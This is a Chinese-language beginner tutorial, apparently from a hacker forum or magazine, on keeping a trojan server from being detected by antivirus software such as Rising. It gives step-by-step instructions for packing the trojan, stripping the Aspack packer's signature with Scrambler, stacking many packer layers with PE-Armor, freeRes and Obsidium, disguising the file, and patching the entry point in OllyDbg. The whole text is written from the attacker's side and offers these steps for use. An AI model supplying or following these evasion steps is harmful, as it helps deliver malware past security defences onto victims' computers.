找木马文件里的特征字符是一件很复杂的事，这里不作主要介绍。既然是菜鸟，我们就要有菜鸟的菜方法！

不知道大家听说过加壳没有，“壳”是为保护软件程序不被非法修改而诞生的。经过加壳后，软件的内部结构会完全改变成另外一个样子，但是当这个软件在运行时又会完全将数据恢复到原样释放到内存里运行。看到这大家应该都明白了，这不就是加密解密的过程吗？对！其实我们免杀时常说的加壳，其实就是加密。

但是我们要怎样加密呢？这里我给大家介绍一个叫做“北斗”的加壳软件（如图1）。

通过界面我们可以看出来也不过如此，不就是个小程序吗？没错，可就是他却能让我们的木马躲过可恶的杀毒软件！我们将需要加密的小程序托甩到这个程序界面上，然后松开鼠标，我们的木马就被读取了（如图2）。

然后点击“压缩”按钮就完成压缩工作了。怎么样，很简单吧？下面我们就来学习怎样用加壳的方法来保护我们的木马。

1.加壳免杀

    加密的程序就一定不被查杀了吗？很不幸，答案是否定的……其实杀毒软件早就想到方法来对付加壳免杀这一伎俩了。你可以用瑞星试试，分开查杀两个同样的木马，一个是加壳的，一个未加壳，如果观察的仔细很容易发现瑞星查杀所用的时间不一样。这能说明什么？也就是说瑞星有它自己的自动脱壳功能，遇到加壳的文件他会先脱壳然后在验测。所以对于加过壳的木马文件会花费更长的时间。

    那我们怎么办呢？其实也不难，瑞星等杀毒软件的脱壳功能也是需要更新的，并不是每一种壳都能脱得掉的，这就给了我们一个机会，我们选择加壳软件时可以选择新出的壳或者比较不常见的壳，也可以是经过牛人们改造的变态壳。总之，只要是不容易被杀毒软件捕获的壳就可以，但是只有加壳才能免杀吗？答案还是否定的，下面我就为大家介绍一下免杀的技巧，顺便介绍几款免杀效果不错的壳。

（1）修改加壳特征

大家通过名字想到了什么？杀毒软件脱壳也是根据壳的特征来自动选择脱壳的方法的，那么我们改一下壳的特征不就可以了吗？这里我给大家介绍一个小工具Scrambler V1.0，它可以将我们加过Aspack2.12壳的文件再做一下二次处理，使加壳文件去掉Aspack2.12壳的标识，防止被自动脱壳或防碍手动脱壳。

我们先给木马服务端加一个Aspack2.12的壳，我们打开Aspack2.12并点击“打开”按钮，选择我们要加密的文件点击“确定”程序就会直接将其加密。下面我们打开Scrambler V1.0点击“应用”按钮，这里会弹出个错误对话框，我们点击“是”即可（如图3）。

然后再弹出的对话框中选择我们刚刚加过Aspack2.12壳的文件，并点击“确定”程序会直接自动处理。我们在用PEID查一下，提示“什么都没找到  *”（如图4）。说明我们已经处理成功了。

小知识：什么是PEID？

PEID是一款非常棒的查壳工具，他可以查出软件加了什么壳，而且查壳速度非常快！最重要的是更新速度也比较快。

（2）加多层壳

对付杀毒软件的方法还有加多层壳这一免杀技巧，只要你加的层数够多，就可以躲过杀毒软件的魔爪。如果再搭配上变态壳配合，那免杀效果就一个字“地球人都知道！”呵呵！

但是如果壳加的不对头，服务端可是就运行不了啦！怎么办呢？所以一时间出现了先加什么壳，再加什么壳的“加壳公式”，但是这样就失去了多层夹克的优势。为了解决问题，黑客们想出了一个妙点子，理论上可以让我们的木马加无数层壳！这里只需要用一个叫做freeRes的程序就可以轻松达到目标！

虽然我们可以加无数层壳，但是这里面还是有一定的规律的，建议大家应该先加加密壳，在加压缩壳。当然这也不是绝对的，你也可以不这么加。但是容易出现问题。

小知识：什么是加密壳，而什么又是压缩壳？

加密壳的任务是加密，一般用加密壳加密的文件都会比原文件大；而压缩壳的主要任务是压缩文件，使其体积减小，一般压缩率可达到50%左右。

我们先运行一款猛壳Hying's PE-Armor，我们打开Hying's PE-Armor后点击“…”选择要保护的文件（如图5）。

然后点击“设置1”选项卡如图6所示选择相应选项。

在“设置2”里我们钩选“将自身隐藏为：”选项，并选择伪装方式（如图7）。下面我们在回到“处理”选项卡点击“保护”按钮即可。这时我们已经将这个猛壳加到我们的木马服务端了。

下一步请出我们的主角freeRes出场，我们运行freeRes后将我们加完壳的服务端托甩到freeRes的主界面里加载，这时一般会弹出一个对话框提示用户载入资源错误，它可能已经被压缩，询问用户是否释放资源继续分析，我们单击“是”即可，然后点击“功能菜单”里的“建立可编辑资源”选项（如图8）。

即可生成一个新的EXE文件。这里要提醒大家注意的是，当你用freeRes释放资源后目标程序会被执行，也就是说如果你用freeRes载入木马服务端的话那么它就会被执行。如果你在配制木马时选择了类似“执行后删除原文件”选项的话，那么你的木马在加载完毕后会被删除，所以要注意及时备份木马服务端，以免发生意外。

下面我们在用一款商业猛壳Obsidium对用freeRes处理完的木马在加一次壳。由于是商业用途的壳，所以操作有些麻烦，我们打开软件后需要先点击“创建方案”按钮，在弹出的对话框中选择“是”，这里我们可以随便起一个名字保存到一个地方（如图9），然后在弹出的对话框中在次随便起一个名字即可。

下面我们选择那个小锁的图标进入保护应用程序界面，我们在“设置”选项卡里的“选择输出目录”项随便选择一个目录。设置完毕后我们在“可执行文件”选项卡里单击“添加”按钮（如图10）。

然后我们在弹出对话框中的“输入文件”里选择我们的木马程序，在“输出文件”里给文件随便取个名字，直接点击“确定”即可。然后点击Obsidium界面下面的“保护全部”就完成了加壳操作。

接下来就是在次使用freeRes释放资源，然后在次加壳……直到不被查杀为止。

关于加多层壳的技巧到这里就讲完了，大家是不是觉得有些麻烦呢？其实免杀确实是一件麻烦事，不管是高手还是新手，都是这样的，但是对于新手还是有一些简单的方法的。

（3）更改入口点

不知道大家看到“入口点”眼晕没有，其实很简单！大家不用知道入口点是作什么，只要记住通过这样处理的木马一般情况下可以过瑞星的内存查杀就可以了。

这里我们要用到一款叫做Ollydbg的软件，打开程序后还是利用老方法将我们服务端直接托甩到Ollydbg里加载（如图11）。

大家看到“PUSH EBP”了吗，我们只要将它改为“POP EBP”就可以了！怎么改？程序被Ollydbg成功加载后鼠标不要乱点，直接按一下空格键即可调出更改界面，我们将里面的“PUSH EBP”改为“POP EBP”，然后点击“汇编”按钮即可（如图12），不过要记住一定不要选择“用NOP填充”这个选项！